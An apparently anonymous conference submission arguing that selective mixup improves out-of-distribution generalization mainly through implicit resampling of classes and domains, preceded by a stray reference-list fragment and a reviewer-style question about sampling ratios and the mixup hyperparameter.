Skanda Koppula, Lois Orosa, A Giray Yağlıkçı, Roknoddin Azizi, Taha Shahroodi, Konstantinos Kanellopoulos, and Onur Mutlu. EDEN: Enabling energy-efficient, high-performance deep neural network inference using approximate DRAM. In *Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture*, pp. 166–181, 2019.

Alex Krizhevsky and Geoffrey Hinton. Learning multiple layers of features from tiny images. Technical report, University of Toronto, Toronto, Ontario, 2009.

Seyed-Mohsen Moosavi-Dezfooli, Alhussein Fawzi, Omar Fawzi, and Pascal Frossard. Universal adversarial perturbations. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 1765–1773, 2017.

Tuan Anh Nguyen and Anh Tran. Input-aware dynamic backdoor attack. *Advances in Neural Information Processing Systems (NeurIPS)*, 33:3454–3464, 2020.

Ozan Özdenizci and Robert Legenstein. Improving robustness against stealthy weight bit-flip attacks by output code matching. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 13388–13397, 2022.
NqQjoncEDR
What makes the difference in the sampling ratio between selective sampling without mixup and resampling? Is this determined by the mixup hyperparameter? When changing the lambda of mixup's beta distribution, do results similar to Fig. 15 still hold?
SELECTIVE MIXUP HELPS WITH DISTRIBUTION SHIFTS, BUT NOT (ONLY) BECAUSE OF MIXUP

Anonymous authors
Paper under double-blind review

ABSTRACT

Context. Mixup is a highly successful technique for improving the generalization of neural networks by augmenting the training data with combinations of random pairs. Selective mixup is a family of methods that apply mixup to specific pairs, e.g. only combining examples across classes or domains. These methods have claimed remarkable improvements on benchmarks with distribution shifts, but their mechanisms and limitations remain poorly understood.

Findings. We examine an overlooked aspect of selective mixup that explains its success in a completely new light. We find that the non-random selection of pairs affects the training distribution and improves generalization by means completely unrelated to the mixing. For example in binary classification, mixup across classes implicitly resamples the data for a uniform class distribution, a classical solution to label shift. We show empirically that this implicit resampling explains much of the improvements in prior work. Theoretically, these results rely on a "regression toward the mean", an accidental property that we identify in several datasets.

Takeaways. We have found a new equivalence between two successful methods: selective mixup and resampling. We identify limits of the former, confirm the effectiveness of the latter, and find better combinations of their respective benefits.

1 INTRODUCTION

Mixup and its variants are some of the few methods that improve generalization across tasks and modalities with no domain-specific information (Zhang et al., 2017). Standard mixup replaces training data with linear combinations of random pairs of examples, proving successful e.g. for image classification (Yun et al., 2019b), semantic segmentation (Islam et al., 2023), natural language processing (Verma et al., 2019), and speech processing (Meng et al., 2021).

This paper focuses on scenarios of distribution shift and variants of mixup that improve out-of-distribution (OOD) generalization. We examine the family of methods that apply mixup to selected pairs of examples, which we refer to as selective mixup (Hwang et al., 2022; Li et al., 2023; Lu et al., 2022a; Palakkadavath et al., 2022; Tian et al., 2023; Xu et al., 2020; Yao et al., 2022b). Each method uses a predefined criterion\(^1\), for example combining examples across classes (Yao et al., 2022b) (Figure 1) or across domains (Xu et al., 2020; Li et al., 2023; Lu et al., 2022a). These simple heuristics have claimed remarkable improvements on benchmarks such as DomainBed (Gulrajani and Lopez-Paz, 2020), WILDS (Koh et al., 2021), and Wild-Time (Yao et al., 2022a).

Despite impressive empirical performance, the theoretical mechanisms of selective mixup remain obscure. For example, the selection criteria in Yao et al. (2022b) include the selection of pairs of the same class/different domains but also the exact opposite. This raises questions:

1. What makes each selection criterion suitable to any specific dataset?
2. Are there multiple mechanisms responsible for the improvements with selective mixup?

This paper presents surprising answers, highlighting an overlooked side effect of selective mixup. The non-random selection of pairs implicitly biases the training distribution and improves generalization by means completely unrelated to the mixing.
We observe empirically that simply forming mini-batches with all instances of the selected pairs (without mixing them) often produces the same improvements as mixing them. This critical ablation was absent from prior studies.

\(^1\)We focus on the basic implementation (Yao et al., 2022b) without modifications to the learning objective.

Figure 1: Selective mixup is a family of methods that replace the training data with combined pairs of examples fulfilling a predefined criterion, e.g., pairs from different classes. An overlooked side effect is to modify the training distribution: here, sampling classes more uniformly. This is responsible for much of the observed improvements in OOD generalization.

We also analyze theoretically the resampling induced by different selection criteria. We find that conditioning on a "different attribute" (e.g., combining examples across classes or domains) brings the training distribution of this attribute closer to a uniform one. Consequently, the imbalances in the data often "regress toward the mean" with selective mixup. We verify empirically that several datasets do indeed shift toward a uniform class distribution in their test split (see Figure 1). We also find remarkable correlation between improvements in performance and the reduction in divergence of training/test distributions due to selective mixup. This also predicts a new failure mode of selective mixup when the above property does not hold (see Appendix C).

Our contributions are summarized as follows.

- We point out an overlooked resampling effect when applying selective mixup (Section 3).
- We show theoretically that certain selection criteria induce a bias in the distribution of features and/or classes equivalent to a "regression toward the mean" (Theorem 3.1). In binary classification for example, selecting pairs across classes is equivalent to sampling uniformly over classes, the standard approach to address label shift and imbalanced data.
- We verify empirically that multiple datasets indeed contain a regression toward a uniform class distribution across training and test splits (Section 4.6). We also find that improvements from selective mixup correlate with reductions in the divergence of training/test distributions over labels and/or covariates. This strongly suggests that resampling is the main driver for these improvements.
- We compare many selection criteria and resampling baselines on five datasets. In all cases, improvements with selective mixup are partly or fully explained by resampling effects (Section 4).

The implications for future research are summarized as follows.

- We connect two areas of the literature by showing that selective mixup is sometimes equivalent to resampling, a classical strategy for distribution shifts (Garg et al., 2023; Idrissi et al., 2022). This hints at possible benefits from advanced methods for label shift and domain adaptation on benchmarks with distribution shifts.
- The resampling explains why different criteria in selective mixup benefit different datasets: they affect distributions of features and/or labels, thus addressing covariate/label shift.
- This explanation highlights the risk of overfitting to the benchmarks: much of the improvements rely on the accidental "regression toward the mean" in the datasets examined.

2 BACKGROUND: MIXUP AND SELECTIVE MIXUP

Notations. We consider a classification model $f_\theta : \mathbb{R}^d \rightarrow [0, 1]^C$ of learned parameters $\theta$.
It maps an input vector $x \in \mathbb{R}^d$ to a vector $y$ of scores over $C$ classes. The training data is typically a set of labeled examples $D = \{(x_i, y_i, d_i)\}_{i=1}^n$ where $y_i$ are one-hot vectors encoding ground-truth labels, and $d_i \in \mathbb{N}$ are optional discrete domain indices. Domain labels are available e.g., in datasets with different image styles (Li et al., 2017) or collected over different time periods (Koh et al., 2021).

Training with ERM. Standard empirical risk minimization (ERM) optimizes the model's parameters for $\min_\theta R(f_\theta, D)$. The expected training risk for a chosen loss function $L$ is:
$$R(f_\theta, D) = \mathbb{E}_{(x, y) \in D} \, L(f_\theta(x), y). \quad (1)$$
An empirical estimate is obtained with an arithmetic mean over instances of the dataset $D$.

Training with mixup. Standard mixup essentially replaces training examples with linear combinations of random pairs in both input and label space. We formalize it by redefining the training risk:
$$R_{\text{mixup}}(f_\theta, D) = \mathbb{E}_{(x,y) \in D} \, L\big(f_\theta(c\,x + (1-c)\,\tilde{x}),\; c\,y + (1-c)\,\tilde{y}\big) \quad (2)$$
with mixing coefficients $c \sim B(2, 2)$ and paired examples $(\tilde{x}, \tilde{y}) \sim D$. The expectation is approximated by sampling coefficients and pairs at every training iteration.

Selective mixup. While standard mixup combines random pairs, selective mixup only combines pairs that fulfill a predefined criterion. To select these pairs, the method starts with the original data $D$, then for every $(x, y, d) \in D$ it selects a $(\tilde{x}, \tilde{y}, \tilde{d}) \in D$ such that they fulfill the criterion represented by the predicate $\text{Paired}(\cdot, \cdot)$. For example, the criterion "same class, different domain" ("intra-label LISA" in Yao et al. (2022b)) is implemented as:
$$\text{Paired}((x, y, d), (\tilde{x}, \tilde{y}, \tilde{d})) = \text{true iff } (\tilde{y} = y) \land (\tilde{d} \neq d) \quad \text{(4a: same class, diff. domain)}$$
Other examples:
$$\text{Paired}((x, y, d), (\tilde{x}, \tilde{y}, \tilde{d})) = \text{true iff } (\tilde{y} \neq y) \quad \text{(4b: different class)}$$
$$\text{Paired}((x, y, d), (\tilde{x}, \tilde{y}, \tilde{d})) = \text{true iff } (\tilde{d} = d) \quad \text{(4c: same domain)}$$

3 SELECTIVE MIXUP MODIFIES THE TRAINING DISTRIBUTION

The new claims of this paper comprise two parts.

1. Estimating the training risk with selective mixup (Eq. 2) uses a different sampling of examples from $D$ than ERM (Eq. 1). We demonstrate this theoretically in this section.
2. We hypothesize that this different sampling of training examples influences the generalization properties of the learned model, regardless of the mixing operation. We verify this empirically in Section 4 using ablations of selective mixup that omit the mixing operation, a critical baseline absent from prior studies.

Training distribution. This distribution refers to the examples sampled from $D$ to estimate the training risk (Eq. 1 or 2), whether these are then mixed or not. The following discussion focuses on distributions over classes ($y$) but analogous arguments apply to covariates ($x$) and domains ($d$).

With ERM, the training distribution equals the dataset distribution because the expectation in Eq. 1 is over uniform samples of $D$. We obtain an empirical estimate by averaging all one-hot labels, giving the vector of discrete probabilities $p_Y(D) = \oplus_{(x,y) \in D}\, y / |D|$ where $\oplus$ is the element-wise sum.
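Before analyzing the distribution that the pairing induces, here is a short, self-contained sketch making the definitions of Section 2 concrete. It is an illustration of Eq. 2 with the criteria (4a-4c), not the reference implementation of Yao et al. (2022b); it assumes a dataset of (x, y, d) triples with one-hot label tensors, and the criterion strings are our own names.

```python
# Illustrative selective mixup: select a partner by a Paired criterion,
# then mix inputs and one-hot labels with c ~ Beta(2, 2).
import random
import torch

def select_pair(example, dataset, criterion):
    x, y, d = example
    if criterion == "same_class_diff_domain":          # criterion (4a)
        pool = [e for e in dataset if torch.equal(e[1], y) and e[2] != d]
    elif criterion == "different_class":               # criterion (4b)
        pool = [e for e in dataset if not torch.equal(e[1], y)]
    elif criterion == "same_domain":                   # criterion (4c)
        pool = [e for e in dataset if e[2] == d]
    else:
        raise ValueError(criterion)
    return random.choice(pool)

def selective_mixup_batch(batch, dataset, criterion):
    beta = torch.distributions.Beta(2.0, 2.0)          # c ~ B(2, 2)
    mixed = []
    for x, y, d in batch:
        x2, y2, _ = select_pair((x, y, d), dataset, criterion)
        c = beta.sample()
        mixed.append((c * x + (1 - c) * x2, c * y + (1 - c) * y2))
    return mixed
```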
With selective mixup, evaluating the risk (Eq. 2) requires pairs of samples. The first element of a pair is sampled uniformly, yielding the same $p_Y(D)$ as ERM. The second element is selected as described above, using the first element and one chosen predicate $\text{Paired}(\cdot, \cdot)$, e.g. from (4a-4c). For our analysis, we denote these "second elements" of the pairs as the virtual data:
$$\tilde{D} = \{(\tilde{x}_i, \tilde{y}_i, \tilde{d}_i) \sim D : \text{Paired}((x_i, y_i, d_i), (\tilde{x}_i, \tilde{y}_i, \tilde{d}_i)) = \text{true}, \forall i = 1, \ldots, |D|\}.$$
We can now analyze the overall training distribution of selective mixup. An empirical estimate is obtained by combining the distributions resulting from the two elements of the pairs, which gives the vector $p_Y(D \cup \tilde{D}) = (p_Y(D) \oplus p_Y(\tilde{D})) / 2$.

Regression toward the mean. With the criterion "same class", it is obvious that $p_Y(\tilde{D}) = p_Y(D)$. These variants of selective mixup are therefore not concerned with resampling effects. In contrast, the criteria "different class" or "different domain" do bias the sampling. In the case of binary classification, we have $p_Y(\tilde{D}) = 1 - p_Y(D)$ and therefore $p_Y(D \cup \tilde{D})$ is uniform. This means that selective mixup with the "different class" criterion has the side effect of balancing the training distribution of classes, a classical mitigation of class imbalance (Japkowicz, 2000; Kubat et al., 1997). For multiple classes, we have a more general result.

Theorem 3.1. Given a dataset $D = \{(x_i, y_i)\}_i$ and paired data $\tilde{D}$ sampled according to the "different class" criterion, i.e. $\tilde{D} = \{(\tilde{x}_i, \tilde{y}_i) \sim D \text{ s.t. } \tilde{y}_i \neq y_i\}$, then the distribution of classes in $D \cup \tilde{D}$ is more uniform than in $D$. Formally, the entropy $\mathbb{H}(p_Y(D)) \leq \mathbb{H}(p_Y(D \cup \tilde{D}))$. Proof: see Appendix D. A small numeric check of this statement is sketched at the end of this section.

Theorem 3.1 readily extends in two ways. First, the same effect also results from the different-domain criterion: if each domain contains a different class distribution, the resampling from this criterion averages them out, yielding a more uniform aggregated training distribution. Second, this averaging applies not only to class labels ($y$) but also to covariates ($x$). An analysis using distributions is ill-suited, but the mechanism similarly affects the sampling of covariates when training with selective mixup.

When does one benefit from the resampling (regardless of mixup)? The above results mean that selective mixup can implicitly reduce imbalances (a.k.a. biases) in the training data. When these are not spurious and also exist in the test data, the effect on predictive performance could be detrimental. We expect benefits (verified in Section 4) on datasets with distribution shifts. By definition, their training/test splits contain different imbalances. Softening imbalances in the training data is then likely to bring the training and test distributions closer, in particular with extreme shifts such as the complete reversal of a spurious correlation (e.g. the waterbirds dataset, see Section 4.1). We also expect benefits on worst-group metrics (e.g. the civilComments dataset, see Section 4.4). The challenge in these datasets comes from the imbalance of class/domain combinations. Prior work has indeed shown that balancing is beneficial (Idrissi et al., 2022; Sagawa et al., 2019).
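The snippet below gives the promised numeric check of Theorem 3.1 on a toy three-class distribution; it is purely illustrative and not part of the paper's proof. For the "different class" criterion, sampling $\tilde{y} \neq y$ proportionally to the remaining class mass gives $p_{\tilde{D}}(j) = \sum_{i \neq j} p_D(i) \, p_D(j) / (1 - p_D(i))$.

```python
# Toy check of Theorem 3.1: "different class" pairing increases entropy.
import numpy as np

def entropy(p):
    p = np.asarray(p, dtype=float)
    return float(-(p * np.log(p)).sum())

p_D = np.array([0.7, 0.2, 0.1])          # imbalanced class distribution of D
p_Dt = np.array([sum(p_D[i] * p_D[j] / (1.0 - p_D[i])
                     for i in range(len(p_D)) if i != j)
                 for j in range(len(p_D))])
p_mix = 0.5 * (p_D + p_Dt)               # class distribution of D ∪ D~
print(entropy(p_D))                      # ≈ 0.80
print(entropy(p_mix))                    # ≈ 1.03, i.e. more uniform
```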
4 EXPERIMENTS

We performed a large number of experiments to understand the contributions of the different effects of selective mixup and other resampling baselines (complete results in Appendix B).

Datasets. We focus on five datasets that previously showed improvements with selective mixup. We selected them to cover a range of modalities (vision, NLP, tabular), settings (binary, multiclass), and types of shifts (covariate, label, and subpopulation shifts).

- **Waterbirds** (Sagawa et al., 2019) is a popular artificial dataset used to study distribution shifts. The task is to classify images of birds into two types. The image backgrounds are also of two types, and the correlation between birds and backgrounds is reversed across the training and test splits. The type of background in each image serves as its domain label.
- **CivilComments** (Koh et al., 2021) is a widely-used dataset of online text comments to be classified as toxic or not. Each example is labeled with a topical attribute (e.g. Christian, male, LGBT, etc.) that is spuriously associated with the ground-truth labels in the training data. These attributes serve as domain labels. The target metric is the worst-group accuracy, where the groups correspond to all toxicity/attribute combinations.
- **Wild-Time Yearbook** (Yao et al., 2022a) contains yearbook portraits to be classified as male or female. It is part of the Wild-Time benchmark, a collection of real-world datasets captured over time. Each example belongs to a discrete time period that serves as its domain label. Distinct time periods are assigned to the training and OOD test splits (see Figure 10).
- **Wild-Time arXiv** (Yao et al., 2022a) contains titles of arXiv preprints. The task is to predict each paper's category among 172 classes. Time periods serve as domain labels.
- **Wild-Time MIMIC-Readmission** (Yao et al., 2022a) contains hospital records (sequences of codes representing diagnoses and treatments) to be classified into two classes. The positive class indicates readmission of the patient to the hospital within 15 days. Time periods serve as domain labels.

Methods. We train standard architectures suited to each dataset with the methods below (details in Appendix A). We perform early stopping, i.e. recording metrics for each run at the epoch of highest ID or worst-group validation performance (for the Wild-Time and waterbirds/civilComments datasets, respectively). We plot average metrics in bar charts over 9 different seeds, with error bars representing ± one standard deviation.

ERM and vanilla mixup are the standard baselines. Baseline resampling uses training examples with equal probability from each class, domain, or combinations thereof, as in Idrissi et al. (2022); Sagawa et al. (2019). Selective mixup (■) includes all possible selection criteria based on classes and domains. We avoid ambiguous terminology from earlier works because of inconsistent usage (e.g. "intra-label LISA" means "different domain" in Koh et al. (2021) but not in Yao et al. (2022a)). Selective sampling (□) is a novel ablation of selective mixup where the selected pairs are not mixed, but the instances are appended one after another in the mini-batch; half are dropped at random to keep the mini-batch size identical to the other methods (see the sketch after this paragraph). Therefore any difference between selective sampling and ERM is attributable only to resampling effects. We also include novel combinations (■) of sampling and mixup.
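As a sketch of the selective-sampling ablation just described (assuming the `select_pair` helper from the earlier snippet), forming the mini-batch amounts to concatenating each example with its selected partner and dropping half at random; this is an illustration, not the exact experimental code.

```python
# "Selective sampling": keep the pair-selection step of selective mixup but
# skip the mixing; drop half of the expanded batch to preserve its size.
import random

def selective_sampling_batch(batch, dataset, criterion):
    expanded = []
    for example in batch:
        expanded.append(example)                              # first element
        expanded.append(select_pair(example, dataset, criterion))  # partner
    random.shuffle(expanded)
    return expanded[:len(batch)]   # any difference vs. ERM is resampling only
```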
4.1 RESULTS ON THE waterbirds DATASET

The target metric for this dataset is the worst-group accuracy, with groups defined as the four class/domain combinations. The two difficulties are (1) a class imbalance (77/23%) and (2) a correlation shift (the spurious class/domain association is reversed at test time). See the discussion in Figure 2.

Figure 2: Main results on waterbirds.

We first observe that vanilla mixup is detrimental compared to ERM. Resampling with uniform class/domain combinations is hugely beneficial, for the reasons explained in Figure 3. The ranking of the various criteria for selective sampling is similar with or without mixup. Most interestingly, the best criterion performs on par with, but no better than, the best resampling. The excellent performance of the best version of selective mixup is here entirely due to resampling.

The efficacy of resampling on this dataset is not a new finding (Idrissi et al., 2022; Sagawa et al., 2019). What is new is its equivalence with the best variant of selective mixup. Figure 3 further supports this claim by comparing the proportions of classes and domains sampled by each method.

Figure 3: The sampling ratios of each class/domain clearly explain the performance of the best methods (waterbirds). Resampling uniform combinations gives them all equal weights, just like the worst-group target metric. Selective mixup with same domain/diff. class also gives equal weights to the classes, while breaking the spurious pattern between groups and classes, unlike any other criterion.

4.2 RESULTS ON THE yearbook DATASET

The difficulty of this dataset comes from a slight class imbalance and the presence of covariate/label shift (see Figure 10). The test split contains several domains (time periods). The target metric is the worst-domain accuracy.

Figure 4 shows that vanilla mixup is slightly detrimental compared to ERM. Resampling for uniform classes gives a clear improvement because of the class imbalance. With selective sampling (no mixup), the only criteria that improve over ERM contain "different class". This is expected because this criterion implicitly resamples for a uniform class distribution.

To investigate whether some of the improvements are due to resampling, we measure the divergence between training and test distributions of classes and covariates (details in Appendix A). Figure 5 shows first that there is a clear variation among different criteria (● blue dots), i.e. some bring the training/test distributions closer to one another. Second, there is a remarkable correlation between the test accuracy and the divergence, for both classes and covariates. This means that resampling effects do occur and play a part in the best variants of selective mixup.

Finally, the improvements from simple resampling and the best variant of selective mixup suggest a new combination. We train a model with uniform class sampling and selective mixup using the

---

3 As expected, the correlation is reversed for the first two test domains in Figure 5 since they are even further from a uniform class distribution than the average of the training data, as seen in Figure 10.

Figure 4: Main results on yearbook. With selective mixup, the "different class" criterion is not useful, but "same class" performs significantly better than ERM. Since this criterion alone does not have resampling effects, it indicates a genuine benefit from mixup restricted to pairs of the same class.
Figure 5: Different selection criteria (●) modify the distribution of both covariates and labels (upper and lower rows). The resulting reductions in divergence between training and test distributions correlate remarkably well with test performance. This confirms the contribution of resampling to the overall performance of selective mixup.

"same class" criterion, and obtain performance superior to all existing results (last row in Figure 5). This confirms the complementarity of the effects of resampling and within-class selective mixup.

4.3 Results on the arXiv Dataset

This dataset has difficulties similar to yearbook and also many more classes (172). Simple resampling for uniform classes is very bad (literally off the chart in Figure 6) because it overcorrects the imbalance (the test distribution being closer to the training distribution than to a uniform one). Resampling for uniform domains is much better, since its effect is similar but milder. All variants of selective mixup (■) perform very well, but they improve over ERM even without mixup (●). Moreover, the selection criteria rank similarly with or without mixup, suggesting that part of the improvement of selective mixup is due to the resampling. Given that vanilla mixup also clearly improves over ERM, the performance of selective mixup is explained by the cumulative effects of vanilla mixup and resampling. This also suggests new combinations of methods (▲), among which we find one version marginally better than the best variant of selective mixup (last row).

4.4 Results on the civilComments Dataset

This dataset mimics a subpopulation shift because the worst-group metric requires high accuracy on classes and domains under-represented in the training data. It also contains an implicit correlation shift because any class/domain association (e.g. "Christian" comments labeled as toxic more often than not) becomes spurious when evaluating individual class/domain combinations. For the above reasons, it makes sense that resampling for uniform classes or combinations greatly improves performance, as shown in prior work (Idrissi et al., 2022). With selective mixup (■), one criterion (same domain/diff. class) performs clearly above all others. But it works even better without mixup! (▲) Among many other variations, none surpasses the uniform-combinations baseline.

4.5 Results on the MIMIC-Readmission Dataset

This dataset contains a class imbalance (about 78/22% in the training data), label shift (the distribution being more balanced in the test split), and possibly covariate shift. It is unclear whether the task is causal or anticausal (labels causing the features) because the inputs contain both diagnoses and treatments. The target metric is the area under the ROC curve (AUROC), which gives equal importance to both classes. We report the worst-domain AUROC, i.e. the lowest value across test time periods.

Vanilla mixup performs a bit better than ERM. Because of the class imbalance, resampling for uniform classes also improves over ERM. As expected, this is perfectly equivalent to the selective sampling criterion "diffClass", and the two therefore perform equally well. Adding mixup is yet a bit better, which suggests again that the performance of selective mixup is merely the result of the independent effects of vanilla mixup and resampling. We further verify this explanation with the novel combination of simple resampling and vanilla mixup, and observe almost no difference whether the mixing operation is performed or not (last two rows in Figure 9).

To investigate the contribution of resampling, we measure the divergence between training/test class distributions and plot it against the test accuracy (Figure 7); a sketch of one such measurement is given below. We observe a strong correlation across methods. Mixup essentially offsets the performance by a constant factor. This again suggests the independence of the effects of mixup and resampling. The resampling baselines (●) also roughly agree with a linear fit to the "selective sampling" points. We therefore hypothesize that all these methods are mostly addressing label shift.
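The exact divergence used is specified in the paper's Appendix A; as one plausible instantiation (an assumption on our part, not necessarily the authors' choice), the snippet below measures the KL divergence between empirical class histograms of the sampled training data and the test data.

```python
# Illustrative divergence between sampled-training and test class
# distributions; the paper's exact measure is defined in its Appendix A.
import numpy as np

def class_dist(labels, num_classes, eps=1e-8):
    counts = np.bincount(labels, minlength=num_classes).astype(float) + eps
    return counts / counts.sum()

def kl(p, q):
    return float(np.sum(p * np.log(p / q)))

train = class_dist(np.array([0, 0, 0, 0, 1]), 2)   # imbalanced training sampling
test = class_dist(np.array([0, 0, 1, 1]), 2)       # more uniform test split
print(kl(test, train))                              # larger = bigger mismatch
```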
We verify this hypothesis with the remarkable fit of an additional point (▲) for a model trained by resampling according to the test-set class distribution, i.e. cheating. It represents an upper bound that might be achievable in future work with methods for label shift (Azizzadenesheli et al., 2019; Lipton et al., 2018). We replicated these observations on every test domain of this dataset (Figure 15 in the appendix).

To further support the claim that these methods mostly address label shift, we report in Table 1 the proportion of the majority class in the training and test data. We observe that the distribution sampled by the best training methods brings it much closer to that of the test data.

| Proportion of majority class (%) | |
|---------------------------------|-------|
| In the dataset (training) | 78.2 |
| In the dataset (validation) | 77.8 |
| In the dataset (OOD test) | **66.5** |

| Sampled by different training methods | |
|--------------------------------------|-------|
| Resampling (uniform classes) | 50.0 |
| Diff. domain + diff. class | 50.0 |
| Diff. class | 50.1 |
| Same domain + diff. class | 49.9 |
| Resampling (uniform cl.) + concatenated pairs | **64.3** |
| Resampling (uniform cl.) + vanilla mixup | **64.3** |

Table 1: The performance of the various methods on MIMIC-Readmission is explained by their correction of a class imbalance. The best training methods (bold numbers) sample the majority class in a proportion much closer to that of the test data.

4.6 Evidence of a "Regression toward the Mean" in the Data

We hypothesized in Section 3 that resampling helps because of a "regression toward the mean" between training and test splits. We now check for this property and indeed find a shift toward uniform class distributions in all datasets studied.

For the Wild-Time datasets, we plot in Figure 10 the ratio of the minority class (for the binary tasks: yearbook, MIMIC) and the class-distribution entropy (for the multiclass task: arXiv). Finding this property agrees with the proposed explanation and with the fact that we selected all three datasets because they previously showed improvements with selective mixup in Yao et al. (2022a). The shift toward uniformity also holds in waterbirds and civilComments, artificially through the worst-group metric. The training data contains imbalanced groups (class/domain combinations) while the worst-group accuracy gives uniform importance to all groups.

Figure 10: The class distribution shifts toward uniformity in these Wild-Time datasets. This agrees with the explanation that the benefits from resampling rely on a "regression toward the mean".

5 Related Work

Mixup and variants. Mixup was originally introduced in Zhang et al. (2017), and numerous variants followed (Cao et al., 2022).
Many propose modality-specific mixing operations: CutMix (Yun et al., 2019a) replaces linear combinations with collages of image patches, FMix (Harris et al., 2020) combines image regions based on frequency contents, and AlignMixup (Venkataramanan et al., 2022) combines images after spatial alignment. Manifold-mixup (Verma et al., 2019) replaces the mixing in input space with the mixing of learned representations, making it applicable to text embeddings.

**Mixup for OOD generalization.** Mixup has been integrated into existing techniques for domain adaptation (DomainMix (Xu et al., 2020)), domain generalization (FIXED (Lu et al., 2022b)), and meta learning (RegMixup (Pinto et al., 2022)). This paper focuses on variants we call "selective mixup" that use non-uniform sampling of the pairs of mixed examples. LISA (Yao et al., 2022b) proposes two heuristics, same-class/different-domain and vice versa, used in proportions tuned by cross-validation on each dataset. Palakkadavath et al. (2022) use same-class pairs and an additional objective to encourage invariance of the representations to the mixing. CIFair (Tian et al., 2023) uses same-class pairs with a contrastive objective to improve algorithmic fairness. SelecMix (Hwang et al., 2022) proposes a selection heuristic to handle biased training data: same class/different biased attribute, or vice versa. DomainMix (Xu et al., 2020) uses different-domain pairs for domain adaptation. DRE (Li et al., 2023) uses same-class/different-domain pairs and regularizes their Grad-CAM explanations to improve OOD generalization. SDMix (Lu et al., 2022a) applies mixup to examples from different domains, with other refinements, to improve cross-domain generalization for activity recognition.

**Explaining the benefits of mixup** has invoked regularization (Zhang et al., 2020) and augmentation (Kimura, 2021) effects, the introduction of label noise (Liu et al., 2023), and the learning of rare features (Zou et al., 2023). These works focus on the mixing and in-domain generalization, whereas we focus on the selection and OOD generalization.

**Training on resampled data.** We find that selective mixup is sometimes equivalent to training on resampled or reweighted data. Both are standard tools to handle distribution shifts in a domain adaptation setting (Japkowicz, 2000; Kubat et al., 1997) and are also known as importance-weighted empirical risk minimization (IW-ERM) (Shimodaira, 2000; Gretton et al., 2009). For covariate shifts, IW-ERM assigns each training point $x$ of label $y$ a weight equal to the likelihood ratio $\frac{p_{\text{target}}(x)}{p_{\text{source}}(x)}$, and for label shifts, $\frac{p_{\text{target}}(y)}{p_{\text{source}}(y)}$ (Azizzadenesheli et al., 2019; Lipton et al., 2018). Several works recently showed that reweighting and resampling are competitive with the state of the art in various OOD (Idrissi et al., 2022; Park et al., 2022; Perrett et al., 2023; Sagawa et al., 2019) and label-shift settings (Garg et al., 2023).

### 6 CONCLUSIONS AND OPEN QUESTIONS

**Conclusions.** This paper helps understand selective mixup, which is one of the most successful and general methods for distribution shifts. We showed unambiguously that much of the improvements were actually unrelated to the mixing operation and could be obtained with much simpler, well-known resampling methods. On datasets where mixup does bring benefits, we could then obtain even better results by combining the independent effects of the best mixup and resampling variants.
**Limitations.** We focused on the simplest version of selective mixup as described by Yao et al. (2022b). Many papers combine the principle with modifications to the learning objective (Hwang et al., 2022; Li et al., 2023; Lu et al., 2022a; Palakkadavath et al., 2022; Tian et al., 2023; Xu et al., 2020). Resampling likely plays a role in these methods too, but this claim requires further investigation. We evaluated "only" five datasets. Since we introduced simple ablations that can single out the effects of resampling, we hope to see future re-evaluations of other datasets. Because we picked datasets that had previously shown benefits with selective mixup, we cannot fully verify the predicted failure when there is no "regression toward the mean" in the data. Still, we do present one experiment in Appendix C that convincingly verifies this prediction on yearbook by swapping the ID and OOD data. Finally, this work is not about designing new algorithms to surpass the state of the art. Our focus is on improving the scientific understanding of existing mixup strategies and their limitations.

**Open questions.** Our results leave open the question of the applicability of selective mixup to real situations. The "regression toward the mean" explanation indicates that much of the observed improvements are accidental, since they rely on an artefact of some datasets. In real deployments, distribution shifts cannot be foreseen in nature nor magnitude. This is a reminder of the relevance of Goodhart's law to machine learning (Teney et al., 2020) and of the risk of overfitting to popular benchmarks (Liao et al., 2021).

REFERENCES

Kamyar Azizzadenesheli, Anqi Liu, Fanny Yang, and Animashree Anandkumar. Regularized learning for domain adaptation under label shifts. *arXiv preprint arXiv:1903.09734*, 2019.

Chengtai Cao, Fan Zhou, Yurou Dai, and Jianping Wang. A survey of mix-based data augmentation: Taxonomy, methods, applications, and explainability. *arXiv preprint arXiv:2212.10888*, 2022.

Saurabh Garg, Nick Erickson, James Sharpnack, Alex Smola, Sivaraman Balakrishnan, and Zachary C Lipton. RLSbench: Domain adaptation under relaxed label shift. *arXiv preprint arXiv:2302.03020*, 2023.

Arthur Gretton, Alex Smola, Jiayuan Huang, Marcel Schmittfull, Karsten Borgwardt, and Bernhard Schölkopf. Covariate shift by kernel mean matching. *Dataset Shift in Machine Learning*, 2009.

Ishaan Gulrajani and David Lopez-Paz. In search of lost domain generalization. *arXiv preprint arXiv:2007.01434*, 2020.

Ethan Harris, Antonia Marcu, Matthew Painter, Mahesan Niranjan, Adam Prügel-Bennett, and Jonathon Hare. FMix: Enhancing mixed sample data augmentation. *arXiv preprint arXiv:2002.12047*, 2020.

Inwoo Hwang, Sangjun Lee, Yunhyeok Kwak, Seong Joon Oh, Damien Teney, Jin-Hwa Kim, and Byoung-Tak Zhang. SelecMix: Debiased learning by contradicting-pair sampling. *arXiv preprint arXiv:2211.02291*, 2022.

Badr Youbi Idrissi, Martin Arjovsky, Mohammad Pezeshki, and David Lopez-Paz. Simple data balancing achieves competitive worst-group-accuracy. In *Conference on Causal Learning and Reasoning*, 2022.

Md Amirul Islam, Matthew Kowal, Konstantinos G Derpanis, and Neil DB Bruce. SegMix: Co-occurrence driven mixup for semantic segmentation and adversarial robustness. *International Journal of Computer Vision*, 131(3):701–716, 2023.

Nathalie Japkowicz. The class imbalance problem: Significance and strategies. In *Proc. of the Int'l Conf. on Artificial Intelligence*, volume 56, pages 111–117, 2000.

Masanari Kimura.
Why mixup improves the model performance. In *International Conference on Artificial Neural Networks (ICANN)*, 2021.

Pang Wei Koh, Shiori Sagawa, Henrik Marklund, Sang Michael Xie, Marvin Zhang, Akshay Balsubramani, Weihua Hu, Michihiro Yasunaga, Richard Lanas Phillips, Irena Gao, et al. WILDS: A benchmark of in-the-wild distribution shifts. In *International Conference on Machine Learning*, 2021.

Miroslav Kubat, Stan Matwin, et al. Addressing the curse of imbalanced training sets: One-sided selection. In *ICML*, volume 97, page 179. Citeseer, 1997.

Da Li, Yongxin Yang, Yi-Zhe Song, and Timothy M Hospedales. Deeper, broader and artier domain generalization. In *IEEE International Conference on Computer Vision*, pages 5542–5550, 2017.

